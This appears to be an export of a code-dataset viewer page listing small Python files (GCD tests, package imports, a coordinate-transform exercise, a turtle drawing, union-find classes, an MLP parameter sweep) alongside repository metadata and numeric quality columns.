| 0.677425
| 0.607936
| 0
| 0.045785
| 0.150108
| 15,702
| 449
| 185
| 34.971047
| 0.743574
| 0.260986
| 0
| 0.623881
| 0
| 0.032836
| 0.700477
| 0.341309
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.119403
| 0.00597
| 0
| 0.00597
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
88f96c727c174f8ff8b1df34ccf4ee09c4f27ad0
| 374
|
py
|
Python
|
test/test_gcd.py
|
neo0057/Algorithms
|
75300184665d71a0fc1248448c509e14b51e05a0
|
[
"WTFPL"
] | 4
|
2018-09-18T09:02:03.000Z
|
2019-11-27T08:29:43.000Z
|
test/test_gcd.py
|
neo0057/Algorithms
|
75300184665d71a0fc1248448c509e14b51e05a0
|
[
"WTFPL"
] | 4
|
2018-10-12T13:32:43.000Z
|
2018-10-24T16:39:02.000Z
|
test/test_gcd.py
|
neo0057/Algorithms
|
75300184665d71a0fc1248448c509e14b51e05a0
|
[
"WTFPL"
] | 9
|
2018-10-12T14:11:26.000Z
|
2019-10-04T08:16:02.000Z
|
import pytest
import fractions
from misc import GCD
def test_gcd():
assert fractions.gcd(30,50) == GCD.greatest_common_divisor(30,50)
assert fractions.gcd(55555,123450) == GCD.greatest_common_divisor(55555,123450)
assert fractions.gcd(-30,-50) == GCD.greatest_common_divisor(-30,-50)
assert fractions.gcd(-1234,1234) == GCD.greatest_common_divisor(-1234,1234)
| 37.4
| 81
| 0.762032
| 55
| 374
| 5.018182
| 0.309091
| 0.217391
| 0.26087
| 0.347826
| 0.492754
| 0.492754
| 0.492754
| 0.492754
| 0.492754
| 0.492754
| 0
| 0.161677
| 0.106952
| 374
| 9
| 82
| 41.555556
| 0.664671
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.125
| true
| 0
| 0.375
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
000728ad494d547b467929484ab896b11b09fb47
| 201
|
py
|
Python
|
scopus/utils/__init__.py
|
mbrcic/scopus
|
570fa6a3e670c9dbf1fee732af49c820b23edd1a
|
[
"MIT"
] | 2
|
2018-10-09T21:19:31.000Z
|
2018-10-10T12:41:26.000Z
|
scopus/utils/__init__.py
|
mbrcic/scopus
|
570fa6a3e670c9dbf1fee732af49c820b23edd1a
|
[
"MIT"
] | null | null | null |
scopus/utils/__init__.py
|
mbrcic/scopus
|
570fa6a3e670c9dbf1fee732af49c820b23edd1a
|
[
"MIT"
] | null | null | null |
from scopus.utils.create_config import *
from scopus.utils.get_content import *
from scopus.utils.get_encoded_text import *
from scopus.utils.startup import *
from scopus.utils.detect_id_type import *
| 33.5
| 43
| 0.825871
| 31
| 201
| 5.16129
| 0.451613
| 0.3125
| 0.46875
| 0.525
| 0.3
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.099502
| 201
| 5
| 44
| 40.2
| 0.883978
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cc456ed9fa4a75fe205b73258c3f5d315de4a347
| 2,523
|
py
|
Python
|
tests/convert_points.py
|
airportyh/cpython
|
e3cb54bdfcafb8493a936ba50d53e496f98f9222
|
[
"0BSD"
] | null | null | null |
tests/convert_points.py
|
airportyh/cpython
|
e3cb54bdfcafb8493a936ba50d53e496f98f9222
|
[
"0BSD"
] | null | null | null |
tests/convert_points.py
|
airportyh/cpython
|
e3cb54bdfcafb8493a936ba50d53e496f98f9222
|
[
"0BSD"
] | null | null | null |
def c3():
global x1
global y1
global x2
global y2
global x3
global y3
global x4
global y4
x1=float(input("What are your x1?"))
y1=float(input("What are your y1?"))
x2=float(input("What are your x2?"))
y2=float(input("What are your y2?"))
x3=float(input("What are your x3?"))
y3=float(input("What are your y3?"))
x4=0
y4=0
def c4():
global x1
global y1
global x2
global y2
global x3
global y3
global x4
global y4
x1=float(input("What are your x1?"))
y1=float(input("What are your y1?"))
x2=float(input("What are your x2?"))
y2=float(input("What are your y2?"))
x3=float(input("What are your x3?"))
y3=float(input("What are your y3?"))
x4=float(input("What are your x4?"))
y4=float(input("What are your y4?"))
print("How many coordinates?")
print("3")
print("4")
answer = input("> ")
if answer == "3":
c3()
elif answer == "4":
c4()
print("Step 1:")
print("1-reflections")
print("2-rotations")
print("3-translations")
answer = input("> ")
if answer == "1":
i = input("across what?")
if i == "y":
x1*-1
x2*-1
x3*-1
x4*-1
elif i == "x":
y1*-1
y2*-1
y3*-1
y4*-1
if answer == "2":
i = input("which way?")
if answer == "90 cw":
x1, y1 = y1, x1
x1*-1
x2, y2 = y2, x2
x2*-1
x3, y3 = y3, x3
x3*-1
x4, y4 = y4, x4
x4*-1
if answer == "90 ccw":
x1, y1 = y1, x1
y1*-1
x2, y2 = y2, x2
y2*-1
x3, y3 = y3, x3
y3*-1
x4, y4 = y4, x4
y4*-1
if answer == "3":
i = float(input("how many units right?"))
i1 = float(input("how many units up?"))
x1+i
x2+i
x3+i
x4+i
y1+i1
y2+i1
y3+i1
y4+i1
print("Step 2:")
print("1-reflections")
print("2-rotations")
print("3-translations")
answer = input("> ")
if answer == "1":
i = input("across what?")
if i == "y":
x1*-1
x2*-1
x3*-1
x4*-1
elif i == "x":
y1*-1
y2*-1
y3*-1
y4*-1
if answer == "2":
i = input("which way?")
if answer == "90 cw":
x1, y1 = y1, x1
x1*-1
x2, y2 = y2, x2
x2*-1
x3, y3 = y3, x3
x3*-1
x4, y4 = y4, x4
x4*-1
if answer == "90 ccw":
x1, y1 = y1, x1
y1*-1
x2, y2 = y2, x2
y2*-1
x3, y3 = y3, x3
y3*-1
x4, y4 = y4, x4
y4*-1
if answer == "3":
i = float(input("how many units right?"))
i1 = float(input("how many units up?"))
x1+i
x2+i
x3+i
x4+i
y1+i1
y2+i1
y3+i1
y4+i1
print("(",x1,",",y1,")")
print("(",x2,",",y2,")")
print("(",x3,",",y3,")")
print("(",x4,",",y4,")")
| 17.520833
| 43
| 0.520809
| 446
| 2,523
| 2.946188
| 0.103139
| 0.136986
| 0.149163
| 0.181126
| 0.896499
| 0.864536
| 0.864536
| 0.864536
| 0.864536
| 0.864536
| 0
| 0.130933
| 0.273484
| 2,523
| 144
| 44
| 17.520833
| 0.585925
| 0
| 0
| 0.873239
| 0
| 0
| 0.208003
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014085
| false
| 0
| 0
| 0
| 0.014085
| 0.105634
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
aeabbe5f1fb6b9ae690a2222955b9802d9cb5603
| 147
|
py
|
Python
|
pybpodapi/protocol/__init__.py
|
ckarageorgkaneen/pybpod-api
|
ebccef800ae1abf3b6a643ff33166fab2096c780
|
[
"MIT"
] | 1
|
2021-01-18T08:18:22.000Z
|
2021-01-18T08:18:22.000Z
|
pybpodapi/protocol/__init__.py
|
ckarageorgkaneen/pybpod-api
|
ebccef800ae1abf3b6a643ff33166fab2096c780
|
[
"MIT"
] | 1
|
2020-09-18T20:46:11.000Z
|
2020-12-29T14:55:20.000Z
|
pybpodapi/protocol/__init__.py
|
ckarageorgkaneen/pybpod-api
|
ebccef800ae1abf3b6a643ff33166fab2096c780
|
[
"MIT"
] | 3
|
2020-09-12T15:32:11.000Z
|
2022-03-11T23:08:03.000Z
|
from pybpodapi.bpod import Bpod
from pybpodapi.state_machine import StateMachine
from pybpodapi.bpod.hardware.output_channels import OutputChannel
| 36.75
| 65
| 0.884354
| 19
| 147
| 6.736842
| 0.578947
| 0.304688
| 0.265625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081633
| 147
| 3
| 66
| 49
| 0.948148
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
aecd29a848ed2fc79f3bdd58691b93d7d31925ca
| 190
|
py
|
Python
|
postpost/api/models/__init__.py
|
PiterPy-Meetup/postpost
|
a0b7f3b8005015335953af5dba7ee4722dcfbfb9
|
[
"MIT"
] | 6
|
2018-12-21T18:18:26.000Z
|
2019-02-23T11:20:53.000Z
|
postpost/api/models/__init__.py
|
JaradC42/postpost
|
a0b7f3b8005015335953af5dba7ee4722dcfbfb9
|
[
"MIT"
] | 78
|
2019-03-02T11:52:45.000Z
|
2020-03-11T02:25:28.000Z
|
postpost/api/models/__init__.py
|
JaradC42/postpost
|
a0b7f3b8005015335953af5dba7ee4722dcfbfb9
|
[
"MIT"
] | 2
|
2019-05-06T08:17:50.000Z
|
2019-10-18T03:23:25.000Z
|
from api.models.attachments import Attachment # noqa: F401
from api.models.platform_settings import PlatformPost # noqa: F401
from api.models.publications import Publication # noqa: F401
| 47.5
| 67
| 0.810526
| 25
| 190
| 6.12
| 0.52
| 0.137255
| 0.254902
| 0.196078
| 0.27451
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054217
| 0.126316
| 190
| 3
| 68
| 63.333333
| 0.86747
| 0.168421
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4e1bca777757939170e9e4b14993ce21aaf0b6b6
| 79
|
py
|
Python
|
firstturtlepythonrun.py
|
SmashedFrenzy16/square
|
7c3d800a23291d74afd65c057f2e9b01a18803d0
|
[
"Apache-2.0"
] | null | null | null |
firstturtlepythonrun.py
|
SmashedFrenzy16/square
|
7c3d800a23291d74afd65c057f2e9b01a18803d0
|
[
"Apache-2.0"
] | null | null | null |
firstturtlepythonrun.py
|
SmashedFrenzy16/square
|
7c3d800a23291d74afd65c057f2e9b01a18803d0
|
[
"Apache-2.0"
] | null | null | null |
from turtle import *
fd(100)
rt(90)
fd(50)
rt(80)
rt(10)
fd(100)
rt(90)
fd(50)
| 7.9
| 20
| 0.632911
| 19
| 79
| 2.631579
| 0.526316
| 0.2
| 0.28
| 0.36
| 0.52
| 0.52
| 0
| 0
| 0
| 0
| 0
| 0.268657
| 0.151899
| 79
| 9
| 21
| 8.777778
| 0.477612
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.111111
| 0
| 0.111111
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4e347026aac844642062524c564ed75e6f3cc5c3
| 1,429
|
py
|
Python
|
data-structures/union_rank/union_rank.py
|
sanchezg/coursera-algorithms
|
8d3922011873737c18f9b6fa49b45a28b796a34c
|
[
"MIT"
] | null | null | null |
data-structures/union_rank/union_rank.py
|
sanchezg/coursera-algorithms
|
8d3922011873737c18f9b6fa49b45a28b796a34c
|
[
"MIT"
] | null | null | null |
data-structures/union_rank/union_rank.py
|
sanchezg/coursera-algorithms
|
8d3922011873737c18f9b6fa49b45a28b796a34c
|
[
"MIT"
] | null | null | null |
class SetUnionRank:
def __init__(self, arr):
self.parents = arr
self.ranks = [0] * self.size
@property
def size(self):
return len(self.parents)
def find(self, i):
while i != self.parents[i - 1]:
i = self.parents[i - 1]
return i
def union(self, i, j):
i_id = self.find(i)
j_id = self.find(j)
if i_id == j_id:
return
if self.ranks[i_id - 1] > self.ranks[j_id - 1]:
self.parents[j_id - 1] = i_id
else:
self.parents[i_id - 1] = j_id
if self.ranks[i_id - 1] == self.ranks[j_id - 1]:
self.ranks[j_id - 1] += 1
class SetUnionRankPathCompression:
def __init__(self, arr):
self.parents = arr
self.ranks = [0] * self.size
@property
def size(self):
return len(self.parents)
def find(self, i):
if i != self.parents[i - 1]:
self.parents[i - 1] = self.find(self.parents[i - 1])
return self.parents[i - 1]
def union(self, i, j):
i_id = self.find(i)
j_id = self.find(j)
if i_id == j_id:
return
if self.ranks[i_id - 1] > self.ranks[j_id - 1]:
self.parents[j_id - 1] = i_id
else:
self.parents[i_id - 1] = j_id
if self.ranks[i_id - 1] == self.ranks[j_id - 1]:
self.ranks[j_id - 1] += 1
| 25.981818
| 64
| 0.496851
| 214
| 1,429
| 3.158879
| 0.107477
| 0.227811
| 0.142012
| 0.115385
| 0.890533
| 0.766272
| 0.766272
| 0.766272
| 0.766272
| 0.766272
| 0
| 0.026637
| 0.369489
| 1,429
| 54
| 65
| 26.462963
| 0.72364
| 0
| 0
| 0.818182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.181818
| false
| 0
| 0
| 0.045455
| 0.363636
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9de9c361ca2ab17edf94290aef0d1ffb329ae41d
| 2,452
|
py
|
Python
|
src/nn/para.py
|
BoxMars/MachineLearningProject
|
9a124369f6b3eaac3a55b156e50003f222107c56
|
[
"MIT"
] | null | null | null |
src/nn/para.py
|
BoxMars/MachineLearningProject
|
9a124369f6b3eaac3a55b156e50003f222107c56
|
[
"MIT"
] | null | null | null |
src/nn/para.py
|
BoxMars/MachineLearningProject
|
9a124369f6b3eaac3a55b156e50003f222107c56
|
[
"MIT"
] | null | null | null |
import numpy as np
from matplotlib import pyplot as plt
from sklearn import tree
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import cross_val_score
from src.data import Data
import time
from sklearn import neural_network
from sklearn.metrics import classification_report, accuracy_score, make_scorer
from sklearn.model_selection import ShuffleSplit, cross_val_score
from src.data import Data
# data = Data()
# min_estimators = 1
# max_estimators = 300
# train_scores = []
# test_scores = []
#
# x, y = data.get_data(data.CROP_DIR)
# nn = neural_network.MLPClassifier(hidden_layer_sizes=(0, ), max_iter=10, alpha=1e-4,
# solver='sgd', verbose=10, random_state=1, learning_rate_init=.1)
# for i in range(min_estimators, max_estimators + 1, 20):
# nn.set_params(hidden_layer_sizes=(i, ))
# nnn=nn.fit(x, y)
# train_scores.append(np.mean(cross_val_score(nnn, x, y, cv=3)))
# #test_scores.append(randomForest.score(x, y))
#
# fig, ax = plt.subplots(dpi = 100)
# ax.set_xlabel("hide_layer")
# ax.set_ylabel("accuracy")
# ax.set_title("Accuracy vs estimators for training and testing sets")
# ax.plot(range(min_estimators, max_estimators + 1, 20), train_scores, label="train",
# drawstyle="steps-post")
# #ax.plot(range(min_estimators, max_estimators + 1, 5), test_scores, label="test",
# # drawstyle="steps-post")
# ax.legend()
# plt.show()
# print("Finish")
#
#
data = Data()
min_estimators = 1
max_estimators = 100
train_scores = []
test_scores = []
x, y = data.get_data(data.CROP_DIR)
nn = neural_network.MLPClassifier(hidden_layer_sizes=(100,0), max_iter=10, alpha=1e-4,
solver='sgd', verbose=10, random_state=1, learning_rate_init=.1)
for i in range(min_estimators, max_estimators + 1, 20):
nn.set_params(hidden_layer_sizes=(100,i))
nnn=nn.fit(x, y)
train_scores.append(np.mean(cross_val_score(nnn, x, y, cv=3)))
#test_scores.append(randomForest.score(x, y))
fig, ax = plt.subplots(dpi = 100)
ax.set_xlabel("hide_layer")
ax.set_ylabel("accuracy")
ax.set_title("Accuracy vs estimators for training and testing sets")
ax.plot(range(min_estimators, max_estimators + 1, 20), train_scores, label="train",
drawstyle="steps-post")
#ax.plot(range(min_estimators, max_estimators + 1, 5), test_scores, label="test",
# drawstyle="steps-post")
ax.legend()
plt.show()
print("Finish")
| 32.693333
| 86
| 0.707586
| 367
| 2,452
| 4.525886
| 0.269755
| 0.062613
| 0.065021
| 0.075858
| 0.852498
| 0.815172
| 0.815172
| 0.773028
| 0.732089
| 0.732089
| 0
| 0.027079
| 0.156607
| 2,452
| 74
| 87
| 33.135135
| 0.776112
| 0.459625
| 0
| 0.0625
| 0
| 0
| 0.072981
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.34375
| 0
| 0.34375
| 0.03125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.